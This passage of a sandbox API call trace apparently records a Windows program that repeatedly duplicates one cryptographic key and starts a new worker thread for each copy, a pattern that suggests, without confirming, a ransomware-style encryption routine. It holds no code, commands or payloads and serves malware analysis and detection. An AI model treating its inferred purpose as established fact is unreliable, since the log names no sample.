(lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x664 [0143.501] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af010, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x668 [0143.502] SetThreadPriority (hThread=0x668, nPriority=0) returned 1 [0143.502] ResetEvent (hEvent=0x664) returned 1 [0143.502] ResumeThread (hThread=0x668) returned 0x1 [0143.502] Sleep (dwMilliseconds=0x0) [0143.503] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6076d4 | out: phKey=0x6076d4*=0x8bdab8) returned 1 [0143.503] GetCurrentThreadId () returned 0x2ec [0143.503] calloc (_Count=0x1, _Size=0xb8) returned 0x28aded0 [0143.503] GetCurrentThreadId () returned 0x2ec [0143.503] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x678 [0143.503] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aded0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x67c [0143.503] SetThreadPriority (hThread=0x67c, nPriority=0) returned 1 [0143.503] ResetEvent (hEvent=0x678) returned 1 [0143.503] ResumeThread (hThread=0x67c) returned 0x1 [0143.503] Sleep (dwMilliseconds=0x0) [0143.505] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6075c4 | out: phKey=0x6075c4*=0x8be0b8) returned 1 [0143.505] GetCurrentThreadId () returned 0x2ec [0143.505] calloc (_Count=0x1, _Size=0xb8) returned 0x28ae1d0 [0143.505] GetCurrentThreadId () returned 0x2ec [0143.505] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x68c [0143.505] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28ae1d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x690 [0143.505] SetThreadPriority (hThread=0x690, nPriority=0) returned 1 [0143.505] ResetEvent (hEvent=0x68c) returned 1 [0143.505] ResumeThread (hThread=0x690) returned 0x1 [0143.505] Sleep (dwMilliseconds=0x0) [0143.506] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607684 | out: phKey=0x607684*=0x8bdaf8) returned 1 [0143.506] GetCurrentThreadId () returned 0x2ec [0143.506] calloc (_Count=0x1, _Size=0xb8) returned 0x28aedd0 [0143.506] GetCurrentThreadId () returned 0x2ec [0143.506] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a0 [0143.506] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28aedd0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x6a4 [0143.507] SetThreadPriority (hThread=0x6a4, nPriority=0) returned 1 [0143.507] ResetEvent (hEvent=0x6a0) returned 1 [0143.507] ResumeThread (hThread=0x6a4) returned 0x1 [0143.507] Sleep (dwMilliseconds=0x0) [0143.516] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607764 | out: phKey=0x607764*=0x8be0f8) returned 1 [0143.516] GetCurrentThreadId () returned 0x2ec [0143.516] calloc (_Count=0x1, _Size=0xb8) returned 0x28af790 [0143.516] GetCurrentThreadId () returned 0x2ec [0143.516] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b4 [0143.516] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af790, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x6b8 [0143.517] SetThreadPriority (hThread=0x6b8, nPriority=0) returned 1 [0143.517] ResetEvent (hEvent=0x6b4) returned 1 [0143.517] ResumeThread (hThread=0x6b8) returned 0x1 [0143.517] Sleep (dwMilliseconds=0x0) [0143.518] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607774 | out: phKey=0x607774*=0x8bdbb8) returned 1 [0143.519] GetCurrentThreadId () returned 0x2ec [0143.519] calloc (_Count=0x1, _Size=0xb8) returned 0x28af6d0 [0143.519] GetCurrentThreadId () returned 0x2ec [0143.519] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c8 [0143.519] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af6d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x6cc [0143.519] SetThreadPriority (hThread=0x6cc, nPriority=0) returned 1 [0143.519] ResetEvent (hEvent=0x6c8) returned 1 [0143.519] ResumeThread (hThread=0x6cc) returned 0x1 [0143.519] Sleep (dwMilliseconds=0x0) [0143.521] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6075e4 | out: phKey=0x6075e4*=0x8c6968) returned 1 [0143.521] GetCurrentThreadId () returned 0x2ec [0143.521] calloc (_Count=0x1, _Size=0xb8) returned 0x28afb50 [0143.521] GetCurrentThreadId () returned 0x2ec [0143.521] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6dc [0143.521] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28afb50, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x6e0 [0143.521] SetThreadPriority (hThread=0x6e0, nPriority=0) returned 1 [0143.521] ResetEvent (hEvent=0x6dc) returned 1 [0143.521] ResumeThread (hThread=0x6e0) returned 0x1 [0143.521] Sleep (dwMilliseconds=0x0) [0143.522] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607604 | out: phKey=0x607604*=0x8c6b28) returned 1 [0143.522] GetCurrentThreadId () returned 0x2ec [0143.522] calloc (_Count=0x1, _Size=0xb8) returned 0x28af550 [0143.522] GetCurrentThreadId () returned 0x2ec [0143.522] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f0 [0143.522] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af550, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x6f4 [0143.523] SetThreadPriority (hThread=0x6f4, nPriority=0) returned 1 [0143.523] ResetEvent (hEvent=0x6f0) returned 1 [0143.523] ResumeThread (hThread=0x6f4) returned 0x1 [0143.523] Sleep (dwMilliseconds=0x0) [0143.535] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607634 | out: phKey=0x607634*=0x8c6ce8) returned 1 [0143.537] GetCurrentThreadId () returned 0x2ec [0143.537] calloc (_Count=0x1, _Size=0xb8) returned 0x28af850 [0143.537] GetCurrentThreadId () returned 0x2ec [0143.537] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x704 [0143.538] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af850, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x5a0 [0143.553] SetThreadPriority (hThread=0x5a0, nPriority=0) returned 1 [0143.553] ResetEvent (hEvent=0x704) returned 1 [0143.553] ResumeThread (hThread=0x5a0) returned 0x1 [0143.553] Sleep (dwMilliseconds=0x0) [0143.555] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607614 | out: phKey=0x607614*=0x918e00) returned 1 [0143.555] GetCurrentThreadId () returned 0x2ec [0143.555] calloc (_Count=0x1, _Size=0xb8) returned 0x28afc10 [0143.555] GetCurrentThreadId () returned 0x2ec [0143.555] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x714 [0143.555] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28afc10, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x718 [0143.556] SetThreadPriority (hThread=0x718, nPriority=0) returned 1 [0143.556] ResetEvent (hEvent=0x714) returned 1 [0143.556] ResumeThread (hThread=0x718) returned 0x1 [0143.556] Sleep (dwMilliseconds=0x0) [0143.557] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607624 | out: phKey=0x607624*=0x919300) returned 1 [0143.557] GetCurrentThreadId () returned 0x2ec [0143.557] calloc (_Count=0x1, _Size=0xb8) returned 0x28af910 [0143.557] GetCurrentThreadId () returned 0x2ec [0143.557] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x728 [0143.557] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af910, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x72c [0143.557] SetThreadPriority (hThread=0x72c, nPriority=0) returned 1 [0143.558] ResetEvent (hEvent=0x728) returned 1 [0143.558] ResumeThread (hThread=0x72c) returned 0x1 [0143.558] Sleep (dwMilliseconds=0x0) [0143.559] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607664 | out: phKey=0x607664*=0x919240) returned 1 [0143.559] GetCurrentThreadId () returned 0x2ec [0143.559] calloc (_Count=0x1, _Size=0xb8) returned 0x28af9d0 [0143.559] GetCurrentThreadId () returned 0x2ec [0143.559] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x73c [0143.559] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af9d0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x740 [0143.559] SetThreadPriority (hThread=0x740, nPriority=0) returned 1 [0143.559] ResetEvent (hEvent=0x73c) returned 1 [0143.559] ResumeThread (hThread=0x740) returned 0x1 [0143.559] Sleep (dwMilliseconds=0x0) [0143.562] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607674 | out: phKey=0x607674*=0x918d80) returned 1 [0143.562] GetCurrentThreadId () returned 0x2ec [0143.562] calloc (_Count=0x1, _Size=0xb8) returned 0x28af610 [0143.562] GetCurrentThreadId () returned 0x2ec [0143.562] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x750 [0143.562] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28af610, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x754 [0143.562] SetThreadPriority (hThread=0x754, nPriority=0) returned 1 [0143.562] ResetEvent (hEvent=0x750) returned 1 [0143.562] ResumeThread (hThread=0x754) returned 0x1 [0143.562] Sleep (dwMilliseconds=0x0) [0143.564] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6076e4 | out: phKey=0x6076e4*=0x919040) returned 1 [0143.564] GetCurrentThreadId () returned 0x2ec [0143.564] calloc (_Count=0x1, _Size=0xb8) returned 0x28afa90 [0143.564] GetCurrentThreadId () returned 0x2ec [0143.564] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x764 [0143.564] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28afa90, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x768 [0143.564] SetThreadPriority (hThread=0x768, nPriority=0) returned 1 [0143.564] ResetEvent (hEvent=0x764) returned 1 [0143.564] ResumeThread (hThread=0x768) returned 0x1 [0143.564] Sleep (dwMilliseconds=0x0) [0143.566] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6076f4 | out: phKey=0x6076f4*=0x918e40) returned 1 [0143.566] GetCurrentThreadId () returned 0x2ec [0143.566] calloc (_Count=0x1, _Size=0xb8) returned 0x28fad70 [0143.566] GetCurrentThreadId () returned 0x2ec [0143.566] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x778 [0143.566] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fad70, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x77c [0143.566] SetThreadPriority (hThread=0x77c, nPriority=0) returned 1 [0143.566] ResetEvent (hEvent=0x778) returned 1 [0143.566] ResumeThread (hThread=0x77c) returned 0x1 [0143.566] Sleep (dwMilliseconds=0x0) [0143.569] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607694 | out: phKey=0x607694*=0x919340) returned 1 [0143.571] GetCurrentThreadId () returned 0x2ec [0143.571] calloc (_Count=0x1, _Size=0xb8) returned 0x28fab30 [0143.571] GetCurrentThreadId () returned 0x2ec [0143.571] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x790 [0143.574] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fab30, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x794 [0143.574] SetThreadPriority (hThread=0x794, nPriority=0) returned 1 [0143.574] ResetEvent (hEvent=0x790) returned 1 [0143.574] ResumeThread (hThread=0x794) returned 0x1 [0143.574] Sleep (dwMilliseconds=0x0) [0143.575] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6076a4 | out: phKey=0x6076a4*=0x919100) returned 1 [0143.575] GetCurrentThreadId () returned 0x2ec [0143.575] calloc (_Count=0x1, _Size=0xb8) returned 0x28fb070 [0143.576] GetCurrentThreadId () returned 0x2ec [0143.576] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7a4 [0143.576] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fb070, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x7a8 [0143.576] SetThreadPriority (hThread=0x7a8, nPriority=0) returned 1 [0143.576] ResetEvent (hEvent=0x7a4) returned 1 [0143.576] ResumeThread (hThread=0x7a8) returned 0x1 [0143.576] Sleep (dwMilliseconds=0x0) [0143.577] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6076b4 | out: phKey=0x6076b4*=0x919080) returned 1 [0143.577] GetCurrentThreadId () returned 0x2ec [0143.577] calloc (_Count=0x1, _Size=0xb8) returned 0x28fabf0 [0143.577] GetCurrentThreadId () returned 0x2ec [0143.577] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b8 [0143.577] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fabf0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x7bc [0143.578] SetThreadPriority (hThread=0x7bc, nPriority=0) returned 1 [0143.578] ResetEvent (hEvent=0x7b8) returned 1 [0143.578] ResumeThread (hThread=0x7bc) returned 0x1 [0143.578] Sleep (dwMilliseconds=0x0) [0143.579] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6076c4 | out: phKey=0x6076c4*=0x919380) returned 1 [0143.579] GetCurrentThreadId () returned 0x2ec [0143.579] calloc (_Count=0x1, _Size=0xb8) returned 0x28faef0 [0143.579] GetCurrentThreadId () returned 0x2ec [0143.579] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7cc [0143.579] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28faef0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x7d0 [0143.579] SetThreadPriority (hThread=0x7d0, nPriority=0) returned 1 [0143.579] ResetEvent (hEvent=0x7cc) returned 1 [0143.579] ResumeThread (hThread=0x7d0) returned 0x1 [0143.579] Sleep (dwMilliseconds=0x0) [0143.580] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607704 | out: phKey=0x607704*=0x919200) returned 1 [0143.581] GetCurrentThreadId () returned 0x2ec [0143.581] calloc (_Count=0x1, _Size=0xb8) returned 0x28fafb0 [0143.581] GetCurrentThreadId () returned 0x2ec [0143.581] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7e0 [0143.581] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fafb0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x7e4 [0143.581] SetThreadPriority (hThread=0x7e4, nPriority=0) returned 1 [0143.581] ResetEvent (hEvent=0x7e0) returned 1 [0143.581] ResumeThread (hThread=0x7e4) returned 0x1 [0143.581] Sleep (dwMilliseconds=0x0) [0143.582] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6078b4 | out: phKey=0x6078b4*=0x919140) returned 1 [0143.582] GetCurrentThreadId () returned 0x2ec [0143.582] calloc (_Count=0x1, _Size=0xb8) returned 0x28facb0 [0143.582] GetCurrentThreadId () returned 0x2ec [0143.582] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7f4 [0143.582] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28facb0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x7f8 [0143.583] SetThreadPriority (hThread=0x7f8, nPriority=0) returned 1 [0143.583] ResetEvent (hEvent=0x7f4) returned 1 [0143.583] ResumeThread (hThread=0x7f8) returned 0x1 [0143.583] Sleep (dwMilliseconds=0x0) [0143.584] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607814 | out: phKey=0x607814*=0x9193c0) returned 1 [0143.584] GetCurrentThreadId () returned 0x2ec [0143.584] calloc (_Count=0x1, _Size=0xb8) returned 0x28fae30 [0143.584] GetCurrentThreadId () returned 0x2ec [0143.584] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x80c [0143.584] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fae30, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x810 [0143.584] SetThreadPriority (hThread=0x810, nPriority=0) returned 1 [0143.584] ResetEvent (hEvent=0x80c) returned 1 [0143.584] ResumeThread (hThread=0x810) returned 0x1 [0143.584] Sleep (dwMilliseconds=0x0) [0143.585] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607894 | out: phKey=0x607894*=0x919480) returned 1 [0143.586] GetCurrentThreadId () returned 0x2ec [0143.586] calloc (_Count=0x1, _Size=0xb8) returned 0x28fb130 [0143.586] GetCurrentThreadId () returned 0x2ec [0143.586] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x820 [0143.586] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fb130, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x824 [0143.587] SetThreadPriority (hThread=0x824, nPriority=0) returned 1 [0143.587] ResetEvent (hEvent=0x820) returned 1 [0143.587] ResumeThread (hThread=0x824) returned 0x1 [0143.587] Sleep (dwMilliseconds=0x0) [0143.588] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6078c4 | out: phKey=0x6078c4*=0x9194c0) returned 1 [0143.588] GetCurrentThreadId () returned 0x2ec [0143.588] calloc (_Count=0x1, _Size=0xb8) returned 0x28fb1f0 [0143.588] GetCurrentThreadId () returned 0x2ec [0143.588] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x834 [0143.588] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fb1f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x838 [0143.588] SetThreadPriority (hThread=0x838, nPriority=0) returned 1 [0143.588] ResetEvent (hEvent=0x834) returned 1 [0143.588] ResumeThread (hThread=0x838) returned 0x1 [0143.588] Sleep (dwMilliseconds=0x0) [0143.590] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607964 | out: phKey=0x607964*=0x9192c0) returned 1 [0143.590] GetCurrentThreadId () returned 0x2ec [0143.590] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa5f0 [0143.590] GetCurrentThreadId () returned 0x2ec [0143.590] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x848 [0143.590] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa5f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x84c [0143.590] SetThreadPriority (hThread=0x84c, nPriority=0) returned 1 [0143.590] ResetEvent (hEvent=0x848) returned 1 [0143.590] ResumeThread (hThread=0x84c) returned 0x1 [0143.590] Sleep (dwMilliseconds=0x0) [0143.591] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607874 | out: phKey=0x607874*=0x919500) returned 1 [0143.592] GetCurrentThreadId () returned 0x2ec [0143.592] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa470 [0143.592] GetCurrentThreadId () returned 0x2ec [0143.592] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x85c [0143.592] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa470, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x860 [0143.592] SetThreadPriority (hThread=0x860, nPriority=0) returned 1 [0143.592] ResetEvent (hEvent=0x85c) returned 1 [0143.592] ResumeThread (hThread=0x860) returned 0x1 [0143.592] Sleep (dwMilliseconds=0x0) [0143.594] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607824 | out: phKey=0x607824*=0x919280) returned 1 [0143.594] GetCurrentThreadId () returned 0x2ec [0143.594] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9870 [0143.594] GetCurrentThreadId () returned 0x2ec [0143.594] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x870 [0143.594] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9870, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x874 [0143.595] SetThreadPriority (hThread=0x874, nPriority=0) returned 1 [0143.595] ResetEvent (hEvent=0x870) returned 1 [0143.595] ResumeThread (hThread=0x874) returned 0x1 [0143.595] Sleep (dwMilliseconds=0x0) [0143.647] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607924 | out: phKey=0x607924*=0x919400) returned 1 [0143.647] GetCurrentThreadId () returned 0x2ec [0143.647] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa830 [0143.647] GetCurrentThreadId () returned 0x2ec [0143.647] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x884 [0143.647] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa830, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x888 [0143.647] SetThreadPriority (hThread=0x888, nPriority=0) returned 1 [0143.647] ResetEvent (hEvent=0x884) returned 1 [0143.647] ResumeThread (hThread=0x888) returned 0x1 [0143.647] Sleep (dwMilliseconds=0x0) [0143.654] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607834 | out: phKey=0x607834*=0x919000) returned 1 [0143.654] GetCurrentThreadId () returned 0x2ec [0143.654] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa170 [0143.654] GetCurrentThreadId () returned 0x2ec [0143.654] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x898 [0143.654] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa170, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x89c [0143.654] SetThreadPriority (hThread=0x89c, nPriority=0) returned 1 [0143.654] ResetEvent (hEvent=0x898) returned 1 [0143.654] ResumeThread (hThread=0x89c) returned 0x1 [0143.654] Sleep (dwMilliseconds=0x0) [0143.656] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6077d4 | out: phKey=0x6077d4*=0x918ec0) returned 1 [0143.656] GetCurrentThreadId () returned 0x2ec [0143.656] calloc (_Count=0x1, _Size=0xb8) returned 0x28f99f0 [0143.656] GetCurrentThreadId () returned 0x2ec [0143.656] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8ac [0143.656] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f99f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x8b0 [0143.656] SetThreadPriority (hThread=0x8b0, nPriority=0) returned 1 [0143.656] ResetEvent (hEvent=0x8ac) returned 1 [0143.656] ResumeThread (hThread=0x8b0) returned 0x1 [0143.656] Sleep (dwMilliseconds=0x0) [0143.657] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6077f4 | out: phKey=0x6077f4*=0x919180) returned 1 [0143.657] GetCurrentThreadId () returned 0x2ec [0143.657] calloc (_Count=0x1, _Size=0xb8) returned 0x28f9930 [0143.657] GetCurrentThreadId () returned 0x2ec [0143.657] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8c0 [0143.657] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f9930, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x8c4 [0143.658] SetThreadPriority (hThread=0x8c4, nPriority=0) returned 1 [0143.658] ResetEvent (hEvent=0x8c0) returned 1 [0143.658] ResumeThread (hThread=0x8c4) returned 0x1 [0143.658] Sleep (dwMilliseconds=0x0) [0143.659] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607844 | out: phKey=0x607844*=0x918e80) returned 1 [0143.659] GetCurrentThreadId () returned 0x2ec [0143.659] calloc (_Count=0x1, _Size=0xb8) returned 0x28fa530 [0143.659] GetCurrentThreadId () returned 0x2ec [0143.659] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8d4 [0143.659] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28fa530, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x8d8 [0143.659] SetThreadPriority (hThread=0x8d8, nPriority=0) returned 1 [0143.660] ResetEvent (hEvent=0x8d4) returned 1 [0143.660] ResumeThread (hThread=0x8d8) returned 0x1 [0143.660] Sleep (dwMilliseconds=0x0) [0143.661] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607864 | out: phKey=0x607864*=0x919440) returned 1 [0143.662] GetCurrentThreadId () returned 0x2ec [0143.662] calloc (_Count=0x1, _Size=0xb8) returned 0x28f96f0 [0143.662] GetCurrentThreadId () returned 0x2ec [0143.662] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8e8 [0143.662] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x28f96f0, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x8ec [0143.662] SetThreadPriority (hThread=0x8ec, nPriority=0) returned 1 [0143.662] ResetEvent (hEvent=0x8e8) returned 1 [0143.662] ResumeThread (hThread=0x8ec) returned 0x1 [0143.662] Sleep (dwMilliseconds=0x0) [0143.663] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x607854 | out: phKey=0x607854*=0x918dc0) returned 1 [0143.663] GetCurrentThreadId () returned 0x2ec [0143.663] calloc (_Count=0x1, _Size=0xb8) returned 